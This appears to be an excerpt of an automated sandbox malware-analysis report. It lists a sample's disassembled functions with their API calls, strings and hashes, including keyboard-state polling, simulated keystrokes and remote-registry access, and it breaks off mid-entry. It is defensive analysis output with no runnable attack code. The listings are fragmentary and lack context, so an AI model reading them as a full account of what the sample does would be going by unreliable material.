csm, xrefs: 014DC7A3
csm, xrefs: 014DC810

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: b751598fd2ccf66b43dcbe45a88420beef94455ac505829fb07c8620026e624a
Instruction ID: 12a41b6687bc7fdf971e7c1ba146f71b1372a9682b245bb633fa97fb52da71ad
Opcode Fuzzy Hash: b751598fd2ccf66b43dcbe45a88420beef94455ac505829fb07c8620026e624a
Instruction Fuzzy Hash: 6AC1497190020ADBCF15DFA9D8E0AAEBBB9BF14311F04425FE811AB362D731DA51CB91

Function 014CE71C Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 014CE723
__Getcvt.LIBCPMT ref: 014CE736
__Getcvt.LIBCPMT ref: 014CE75A
_Maklocstr.LIBCPMT ref: 014CE78C
_Maklocstr.LIBCPMT ref: 014CE79E
_Maklocchr.LIBCPMT ref: 014CE7B6
_Maklocchr.LIBCPMT ref: 014CE7C6
_Getvals.LIBCPMT ref: 014CE7E8

Part of subcall function 014C7EC8: _Maklocchr.LIBCPMT ref: 014C7EF7
Part of subcall function 014C7EC8: _Maklocchr.LIBCPMT ref: 014C7F0D

Strings

true, xrefs: 014CE799
false, xrefs: 014CE787

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Maklocchr$GetcvtMaklocstr$GetvalsH_prolog3_
String ID: false$true
API String ID: 2593140031-2658103896
Opcode ID: da76e192a1ffcb1f503569c8157922c2a35b3bc8b6888baf6f2776fb88160a49
Instruction ID: 02bcec8d40082cd32469ec5b5b3c6be4431a8559a74fb0ee3a4ad723a682d5f5
Opcode Fuzzy Hash: da76e192a1ffcb1f503569c8157922c2a35b3bc8b6888baf6f2776fb88160a49
Instruction Fuzzy Hash: 7C2141B6D00315AADF55EFA6D884A9F7FA8EF25B10F00841FB904AF261DB718544CBA1

Function 00C50374 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00C5039C
GetAsyncKeyState.USER32(000000A0), ref: 00C5041D
GetKeyState.USER32(000000A0), ref: 00C50438
GetAsyncKeyState.USER32(000000A1), ref: 00C50452
GetKeyState.USER32(000000A1), ref: 00C50467
GetAsyncKeyState.USER32(00000011), ref: 00C5047F
GetKeyState.USER32(00000011), ref: 00C50491
GetAsyncKeyState.USER32(00000012), ref: 00C504A9
GetKeyState.USER32(00000012), ref: 00C504BB
GetAsyncKeyState.USER32(0000005B), ref: 00C504D3
GetKeyState.USER32(0000005B), ref: 00C504E5

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 718786e4722df8ae324a531620a16a01648f0f4424a1d6210ae2783e412bd771
Instruction ID: 6daa7da86d593f3fe56153dd11a34077c5f4da0141e072ebb8eb2fb9611fcc8b
Opcode Fuzzy Hash: 718786e4722df8ae324a531620a16a01648f0f4424a1d6210ae2783e412bd771
Instruction Fuzzy Hash: ED41F9385447C96AFF31866488043B5BFA06F11342F288059DED5D66C2EBA45BCCCBAE

Function 014C02D0 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 201COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 014C0323
std::_Lockit::_Lockit.LIBCPMT ref: 014C0345
std::_Lockit::~_Lockit.LIBCPMT ref: 014C0365
__Getcvt.LIBCPMT ref: 014C0422
__Getcvt.LIBCPMT ref: 014C046C

Part of subcall function 01402350: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 01402376
Part of subcall function 01402350: std::_Lockit::~_Lockit.LIBCPMT ref: 0140240A

std::_Facet_Register.LIBCPMT ref: 014C053D
std::_Lockit::~_Lockit.LIBCPMT ref: 014C0555

Strings

true, xrefs: 014C04A9
false, xrefs: 014C0493

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::~_$GetcvtLockit::_$Facet_Locinfo::_Locinfo_dtorRegister
String ID: false$true
API String ID: 2460365190-2658103896
Opcode ID: 2faec3e7f454014935391bb3d8e2d1ca6b46bc2c81b545dd0bd52831fcf33f3a
Instruction ID: e2695777e5d48ca98219429573019c0078add871e3bbb6d118cf96de47e52f1f
Opcode Fuzzy Hash: 2faec3e7f454014935391bb3d8e2d1ca6b46bc2c81b545dd0bd52831fcf33f3a
Instruction Fuzzy Hash: 4C818EB5D00309DBDB21DF95C840BDEB7F4BF29710F14826EE805AB251EB75AA44CB91

Function 00C6886D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF4D37: __itow.LIBCMT ref: 00BF4D62
Part of subcall function 00BF4D37: __swprintf.LIBCMT ref: 00BF4DAC

CoInitialize.OLE32 ref: 00C688B5
CoUninitialize.OLE32 ref: 00C688C0
CoCreateInstance.OLE32(?,00000000,00000017,00C83BBC,?), ref: 00C68920
IIDFromString.OLE32(?,?), ref: 00C68993
#8.OLEAUT32(?), ref: 00C68A2D
#9.WSOCK32(?,?), ref: 00C68A8E

Strings

Invalid parameter, xrefs: 00C689AC
NULL Pointer assignment, xrefs: 00C68965
Failed to create object, xrefs: 00C6892B, 00C689E1

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: CreateFromInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 1994486276-1287834457
Opcode ID: ab605df7596f2505c68e6c505294c37b71c26c527e35e345c4793dfc46708d9d
Instruction ID: bec87692f2dfd8e4623a18c4a0fe880968b622535225a511153b723fb74e7e0f
Opcode Fuzzy Hash: ab605df7596f2505c68e6c505294c37b71c26c527e35e345c4793dfc46708d9d
Instruction Fuzzy Hash: 6A61AF702083019FD720DF64C889B6EB7E4EF49714F104A59FA859B291CB70ED8CDB92

Function 00C2C013 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00BF260D
SetTextColor.GDI32(?,000000FF), ref: 00BF2617
SetBkMode.GDI32(?,00000001), ref: 00BF262C
GetStockObject.GDI32(00000005), ref: 00BF2634
GetClientRect.USER32(?), ref: 00C2C02C
SendMessageW.USER32(?,00001328,00000000,?), ref: 00C2C043
GetWindowDC.USER32(?), ref: 00C2C04F
GetPixel.GDI32(00000000,?,?), ref: 00C2C05E
ReleaseDC.USER32(?,00000000), ref: 00C2C070
GetSysColor.USER32(00000005), ref: 00C2C08E

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: b0e817ef3c542b06790ecba67cff9ab0b7167f8126167a04c21d2315e79ad2ab
Instruction ID: 532255062782e58c9935284dedfe21cc3742ac341c28ce97344162d79f2594fa
Opcode Fuzzy Hash: b0e817ef3c542b06790ecba67cff9ab0b7167f8126167a04c21d2315e79ad2ab
Instruction Fuzzy Hash: AC113732500205BFDBA15FA4EC49BED7BB1EF18331F204265FA25960E1CB310959EF19

Function 00C4AB4C Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00C4AF1D), ref: 00C4AE5B

Strings

CLASS, xrefs: 00C4ABDA
REGEXPCLASS, xrefs: 00C4AC20
INSTANCE, xrefs: 00C4AD69
TEXT, xrefs: 00C4AD92
CLASSNN, xrefs: 00C4ABFD
NAME, xrefs: 00C4AC8D

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 655f3ad4c013a05425e1747d78095a34c808519968338cb87554499e0a0baecc
Instruction ID: c606e3b4df5d190756a60fe1dd2da3944fd7abb574a882a2c86bdc8ff5d53b22
Opcode Fuzzy Hash: 655f3ad4c013a05425e1747d78095a34c808519968338cb87554499e0a0baecc
Instruction Fuzzy Hash: 0C91C870A40506ABDF08DF60C481BEEFB79FF45304F508119E86AA7191DF70AA99EBD1

Function 00C7C3AF Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BF29F3

Part of subcall function 00BF2714: GetCursorPos.USER32(?), ref: 00BF2727
Part of subcall function 00BF2714: ScreenToClient.USER32(00CB67B0,?), ref: 00BF2744
Part of subcall function 00BF2714: GetAsyncKeyState.USER32(?), ref: 00BF2769
Part of subcall function 00BF2714: GetAsyncKeyState.USER32(?), ref: 00BF2777

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00C7C417
ImageList_EndDrag.COMCTL32 ref: 00C7C41D
ReleaseCapture.USER32 ref: 00C7C423
SetWindowTextW.USER32(?,00000000), ref: 00C7C4CD
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00C7C4E0
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00C7C5C2

Strings

@GUI_DROPID, xrefs: 00C7C514
@GUI_DRAGFILE, xrefs: 00C7C557

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 659d67666fa12d8e7bbfff8409307c5fd5bb6a05da769f92f87c3a0b08bbde18
Instruction ID: d175300e9f4075a94cc3127f53d863d23f3fa1ac62a59e791235fa705147fc10
Opcode Fuzzy Hash: 659d67666fa12d8e7bbfff8409307c5fd5bb6a05da769f92f87c3a0b08bbde18
Instruction Fuzzy Hash: 76517971204205AFDB14EF20CC96BAE7BE1FB84310F10862DF959972E1CB71A959DB52

Function 014F91EA Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,014FAC8F), ref: 014F9203

Strings

exp, xrefs: 014F9282, 014F92E7
log10, xrefs: 014F9245, 014F9254
acos, xrefs: 014F9339
sqrt, xrefs: 014F9342
asin, xrefs: 014F9330
log, xrefs: 014F9260, 014F926F
pow, xrefs: 014F92A1, 014F934B, 014F9398

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 4b588d65fcc7720937304a9ccc0c3334f43c99411af2ebd3ee76f90b10fd3e8f
Instruction ID: 5f5d8c6b7b37ca5b4946f5f9d04de87eeb9d283ae80250c005775a71544814b6
Opcode Fuzzy Hash: 4b588d65fcc7720937304a9ccc0c3334f43c99411af2ebd3ee76f90b10fd3e8f
Instruction Fuzzy Hash: DA519B7490420ECBDF159F9DD9482AE7FB4FB49308F06045BF690AB3A8CB318525CB01

Function 00C78A32 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C78AEC

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 7808eeea5cbd743d7742858a8c136051e0d9a9af3e1c2d10c0465f974c56f96a
Instruction ID: 2fcf32d0b0d7a3c358f87b250575471525eebae2e9025d0ea2bf1d0f2b547842
Opcode Fuzzy Hash: 7808eeea5cbd743d7742858a8c136051e0d9a9af3e1c2d10c0465f974c56f96a
Instruction Fuzzy Hash: 365193B0581208BFEF219B25CC8DB5D7BA4BB05360F208516F728D61E1CF71AA9C9B51

Function 00C4A009 Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C4B310: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C4B330
Part of subcall function 00C4B310: GetCurrentThreadId.KERNEL32 ref: 00C4B337
Part of subcall function 00C4B310: AttachThreadInput.USER32(00000000,?,00C4A01E,?,00000001), ref: 00C4B33E

MapVirtualKeyW.USER32(00000025,00000000), ref: 00C4A029
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C4A046
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C4A049
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C4A052
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C4A070
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C4A073
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C4A07C
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C4A093
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C4A096

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: f7381f2f8e4898d644abfc3c6bde628c81b836b5c4fb898c6a901b8423e83555
Instruction ID: 8d9c552bc654a503b212c7f843e24367745a6735dc4bd3e5d0aad709474933b8
Opcode Fuzzy Hash: f7381f2f8e4898d644abfc3c6bde628c81b836b5c4fb898c6a901b8423e83555
Instruction Fuzzy Hash: 601104B1550618BEF6106F618C8DF6E3F2DEB4C761F200419F6446B0A0CAF26C509BA8

Function 014BAEC0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

Part of subcall function 014BC820: std::locale::_Init.LIBCPMT ref: 014BC916

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 014BB212
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 014BB221
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 014BB25B
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 014BB32E
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 014BB33D
SafeArrayGetElement.OLEAUT32(?,?,?), ref: 014BB370

Strings

Unknown data type, xrefs: 014BB30C

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: ArraySafe$Bound$Element$Initstd::locale::_
String ID: Unknown data type
API String ID: 1810180989-732792229
Opcode ID: e40b85d7d1e40e987f63c96cb46d85aca67e4eedf20c75136b0307cc869640e6
Instruction ID: 50a7c3ee0c3415bc6c8fdc807622de4fb0ab087e7ad829c15bef76ed14a3b68f
Opcode Fuzzy Hash: e40b85d7d1e40e987f63c96cb46d85aca67e4eedf20c75136b0307cc869640e6
Instruction Fuzzy Hash: 6FA19170A0011A9FDB29DF68CC84BEEB7B5FF54300F1085AAD505A7664DB34AE84CFA1

Function 00C54655 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C5466F
LoadStringW.USER32(00000000), ref: 00C54676
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C5468C
LoadStringW.USER32(00000000), ref: 00C54693
_wprintf.LIBCMT ref: 00C546B9
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C546D7

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00C546B4

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: da0f75aead4e41d3f6b372a7808304c152d293f34ce86e329765fe9998707209
Instruction ID: cb65c68267b746e28a0d3347a896d86f0e6ec31e076c6df083f5f6e01409c315
Opcode Fuzzy Hash: da0f75aead4e41d3f6b372a7808304c152d293f34ce86e329765fe9998707209
Instruction Fuzzy Hash: 6D0162F69402087FE751A7909D89FFA776CEB08305F1005A5BB45E2041EA745E888B79

Function 00C70139 Relevance: 12.3, APIs: 8, Instructions: 256registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77

Part of subcall function 00C71242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C701D5,?,?), ref: 00C71259

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C70216

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper_memmove
String ID:
API String ID: 3479070676-0
Opcode ID: 71f9169cc70db3546eb49f9ad0ba106d866e34ec81829bebe6950849adfdcd87
Instruction ID: 65fefaf76673a7324e8663a70b0d3b2ab59028ea923316ef01c3e3eee4ab44c5
Opcode Fuzzy Hash: 71f9169cc70db3546eb49f9ad0ba106d866e34ec81829bebe6950849adfdcd87
Instruction Fuzzy Hash: 46A19C31204205DFDB10EF54C885B6EB7E5BF84314F24891DFAAA9B2A2DB31ED45DB42

Function 01425430 Relevance: 12.1, APIs: 8, Instructions: 147COMMON

Download Yara Rule

APIs

Part of subcall function 014D886F: EnterCriticalSection.KERNEL32(0152B5F4,?,03FFFFFF,?,01425448,00000000,?,03FFFFFF,?,940E2C7A,?,?,?), ref: 014D887A
Part of subcall function 014D886F: LeaveCriticalSection.KERNEL32(0152B5F4,?,01425448,00000000,?,03FFFFFF,?,940E2C7A,?,?,?), ref: 014D88A6

FindResourceExW.KERNEL32(00000000,00000006,00000001,00000000,00000000,?,03FFFFFF,?,940E2C7A), ref: 01425476
LoadResource.KERNEL32(00000000,00000000,?,940E2C7A), ref: 01425484
LockResource.KERNEL32(00000000,?,940E2C7A), ref: 0142548F
SizeofResource.KERNEL32(00000000,00000000,?,940E2C7A), ref: 0142549D
FindResourceW.KERNEL32(00000000,?,00000006,?,940E2C7A), ref: 01425500
LoadResource.KERNEL32(00000000,00000000,?,940E2C7A), ref: 01425513
LockResource.KERNEL32(00000000,?,940E2C7A), ref: 01425522
SizeofResource.KERNEL32(00000000,00000001,?,940E2C7A), ref: 01425536

Memory Dump Source

Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1400000_Later.jbxd

Yara matches

Similarity

API ID: Resource$CriticalFindLoadLockSectionSizeof$EnterLeave
String ID:
API String ID: 506522749-0
Opcode ID: 16a991bbf2a925c34e5ef84979cf382fbd2b39566d8e577101056e6a3666d804
Instruction ID: 26e0391d4bf4b254deba0e30ebd1ec88893209da58e55d3a6c3c7a8abd58d82d
Opcode Fuzzy Hash: 16a991bbf2a925c34e5ef84979cf382fbd2b39566d8e577101056e6a3666d804
Instruction Fuzzy Hash: 11410332A012259BDB329F68C884ABFB7F9FF40701B45052EED55DF364EA30D9818650

Function 00C765C0 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00C765D8
GetDC.USER32(00000000), ref: 00C765E0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C765EB
ReleaseDC.USER32(00000000,00000000), ref: 00C765F7
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00C76633
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00C76644
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00C79417,?,?,000000FF,00000000,?,000000FF,?), ref: 00C7667E
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00C7669E

Memory Dump Source

Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true

Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_bf0000_Later.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 22195866dc0da927da7c914c9ba605c62a8cff18b73191fcab2f4b2425114cef
Instruction ID: 265c47cc83fa54e972f38e15887c7f9095c5dc7cd297a58d67f2b9a94d6bed91
Opcode Fuzzy Hash: 22195866dc0da927da7c914c9ba605c62a8cff18b73191fcab2f4b2425114cef
Instruction Fuzzy Hash: 07317872201614AFEB518F10CC8AFEA3BA9EF49761F044055FE08AA291D6759855CBA8

Function 00C4C52B Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00C4C540
_memcmp.LIBCMT ref: 00C4C562
_memcmp.LIBCMT ref: 00C4C57A
_memcmp.LIBCMT ref: 00C4C58D
_memcmp.LIBCMT ref: 00C4C5A7
_memcmp.LIBCMT ref: 00C4C5BA
